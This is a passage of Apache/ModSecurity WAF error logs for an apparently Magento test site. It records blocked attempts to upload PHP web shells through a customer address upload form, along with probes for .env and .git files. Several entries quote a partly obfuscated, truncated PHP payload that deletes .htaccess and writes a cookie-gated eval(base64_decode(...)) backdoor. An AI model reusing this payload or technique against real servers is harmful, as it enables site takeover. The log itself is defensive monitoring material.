"aVIQSgr0ig2jL4trDlZ2hwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:22.155780 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.php8"] [unique_id "aVIQSgr0ig2jL4trDlZ2hwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:22.155955 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.php8"] [unique_id "aVIQSgr0ig2jL4trDlZ2hwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:15.973391 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Rule 7fc32a61cbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.phar"] [unique_id "aVN-l2kuKTvBtTO8F8615AAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:15.973846 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.phar"] [unique_id "aVN-l2kuKTvBtTO8F8615AAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:15.976262 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.phar"] [unique_id "aVN-l2kuKTvBtTO8F8615AAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:15.976442 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.phar"] [unique_id "aVN-l2kuKTvBtTO8F8615AAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:16.527115 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: qj88364f428d25.php8 found within FILES:custom_attributes[country_id]: qj88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVN-mGkuKTvBtTO8F8615QAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/j/qj88364f428d25.phar
[Tue Dec 30 08:26:16.527726 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVN-mGkuKTvBtTO8F8615QAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/j/qj88364f428d25.phar
[Tue Dec 30 08:26:16.527901 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVN-mGkuKTvBtTO8F8615QAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/j/qj88364f428d25.phar
[Tue Dec 30 08:26:16.843699 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Rule 7fc32a61cbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.php8"] [unique_id "aVN-mGkuKTvBtTO8F8615gAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:16.844144 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.php8"] [unique_id "aVN-mGkuKTvBtTO8F8615gAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:16.846554 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.php8"] [unique_id "aVN-mGkuKTvBtTO8F8615gAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 08:26:16.846746 2025] [:error] [pid 1074060] [client 194.110.207.198:56162] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/j/qj88364f428d25.php8"] [unique_id "aVN-mGkuKTvBtTO8F8615gAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 30 09:38:18.278764 2025] [authz_core:error] [pid 1076242] [client 206.189.2.13:51454] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 30 09:38:21.279547 2025] [:error] [pid 1074060] [client 206.189.2.13:51482] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVOPfWkuKTvBtTO8F8617gAAAAE"]
[Tue Dec 30 09:38:21.279791 2025] [:error] [pid 1074060] [client 206.189.2.13:51482] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVOPfWkuKTvBtTO8F8617gAAAAE"]
[Tue Dec 30 09:38:21.279946 2025] [:error] [pid 1074060] [client 206.189.2.13:51482] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVOPfWkuKTvBtTO8F8617gAAAAE"]
[Tue Dec 30 09:38:22.287035 2025] [:error] [pid 1074059] [client 206.189.2.13:51492] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVOPfu9oALJ4W8ifGBsD8AAAAAA"]
[Tue Dec 30 09:38:22.287254 2025] [:error] [pid 1074059] [client 206.189.2.13:51492] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVOPfu9oALJ4W8ifGBsD8AAAAAA"]
[Tue Dec 30 09:38:22.287396 2025] [:error] [pid 1074059] [client 206.189.2.13:51492] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVOPfu9oALJ4W8ifGBsD8AAAAAA"]
[Tue Dec 30 09:38:24.287944 2025] [:error] [pid 1074061] [client 206.189.2.13:51498] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVOPgDshcYdIl9SnQghAPwAAAAI"]
[Tue Dec 30 09:38:24.288183 2025] [:error] [pid 1074061] [client 206.189.2.13:51498] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVOPgDshcYdIl9SnQghAPwAAAAI"]
[Tue Dec 30 09:38:24.288347 2025] [:error] [pid 1074061] [client 206.189.2.13:51498] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVOPgDshcYdIl9SnQghAPwAAAAI"]
[Wed Dec 31 10:43:13.912958 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Rule 7fe6fe2a0be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.phar"] [unique_id "aVTwMUdyGCWL1cLE7PWB-wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:13.913514 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.phar"] [unique_id "aVTwMUdyGCWL1cLE7PWB-wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:13.915776 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.phar"] [unique_id "aVTwMUdyGCWL1cLE7PWB-wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:13.915982 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.phar"] [unique_id "aVTwMUdyGCWL1cLE7PWB-wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:14.159392 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: rc88364f428d25.php8 found within FILES:custom_attributes[country_id]: rc88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVTwMkdyGCWL1cLE7PWB_AAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/c/rc88364f428d25.phar
[Wed Dec 31 10:43:14.160030 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVTwMkdyGCWL1cLE7PWB_AAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/c/rc88364f428d25.phar
[Wed Dec 31 10:43:14.160231 2025] [:error] [pid 1095597] [client 91.84.106.190:52366] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVTwMkdyGCWL1cLE7PWB_AAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/c/rc88364f428d25.phar
[Wed Dec 31 10:43:19.708494 2025] [:error] [pid 1096224] [client 91.84.106.190:35896] [client 91.84.106.190] ModSecurity: Rule 7fe6fe2a0be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.php8"] [unique_id "aVTwN8x_6rWfA2Lm-3A_ogAAABg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:19.708942 2025] [:error] [pid 1096224] [client 91.84.106.190:35896] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.php8"] [unique_id "aVTwN8x_6rWfA2Lm-3A_ogAAABg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:19.711394 2025] [:error] [pid 1096224] [client 91.84.106.190:35896] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.php8"] [unique_id "aVTwN8x_6rWfA2Lm-3A_ogAAABg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 31 10:43:19.711563 2025] [:error] [pid 1096224] [client 91.84.106.190:35896] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/c/rc88364f428d25.php8"] [unique_id "aVTwN8x_6rWfA2Lm-3A_ogAAABg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.217576 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Rule 7f24adb14be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.phar"] [unique_id "aVZxSqOAnROfyL1tsdBeXAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
